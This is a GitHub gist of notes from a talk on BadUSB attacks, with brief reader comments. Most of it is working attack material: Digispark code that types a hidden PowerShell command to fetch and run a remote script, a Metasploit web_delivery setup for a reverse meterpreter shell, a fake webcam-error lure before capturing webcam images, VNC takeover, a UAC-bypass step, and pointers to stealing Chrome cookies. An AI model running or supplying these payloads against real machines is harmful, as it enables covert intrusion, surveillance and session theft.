/notes-null-talk.txt
Last active Jun 2, 2019
Notes of Null talk on BadUSB
| ## Bad USB code | |
| #include "DigiKeyboard.h" | |
| #define WorkingPin 1 // Just as an LED indicator, as to when the work is finished | |
| void setup() { | |
| } | |
| void loop() { | |
| digitalWrite(WorkingPin, HIGH); | |
| DigiKeyboard.sendKeyStroke(0); | |
| DigiKeyboard.delay(500); | |
| DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); | |
| DigiKeyboard.delay(500); | |
| DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');"); | |
| DigiKeyboard.sendKeyStroke(KEY_ENTER); | |
| digitalWrite(WorkingPin, LOW); | |
| for (;;) { | |
| /*Stops the digispark from running the scipt again*/ | |
| } | |
| } | |
| ## Metasploit resource file used in demonstration msf-web-delivery.rc | |
| use exploit/multi/script/web_delivery | |
| set Target 2 | |
| set LHOST <YOUR_LOCAL_IP_HERE> | |
| set LPORT 6680 | |
| set payload windows/x64/meterpreter/reverse_tcp | |
| set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies | |
| exploit -j | |
| ## For Popping up an innocuous message box, before starting capturing webcam snaps | |
| DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527 | |
| railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox | |
| If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this : | |
| client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) | |
| ## For VNC | |
| After getting a meterpreter session : run vnc | |
| Then connect with a VNC client on the "local machine" | |
| ## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ ) | |
| use exploit/windows/local/bypassuac_comhijack | |
| set payload windows/x64/meterpreter/reverse_tcp | |
| set session 2 | |
| set LHOST <YOUR_LOCAL_IP_HERE> | |
| exploit | |
| ## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled : | |
| https://mango.pdf.zone/stealing-chrome-cookies-without-a-password | |
| You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323 | |
| There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md | |
| ## State of the art things | |
| Bad USB cables : https://mg.lol/blog/badusb-cables/ | |
| O.M.G. cables : https://mg.lol/blog/omg-cable/ | |
| ## Other Useful Things | |
| DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts | |
| #shamelessSelfPromotion Ahead :p | |
| You can read my other blogs here : https://lud1161.github.io/ | |
| and | |
| Here : https://lud1161.wordpress.com/ |
This comment has been minimized.
This comment has been minimized.
|
Hello @vishwaskheriwal, sorry to break out to you but the talk wasn't recorded and I am not getting time enough to make a tutorial for the same and put it up online. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
vishwaskheriwal commentedJun 2, 2019
Sir can you provide a video on this topic.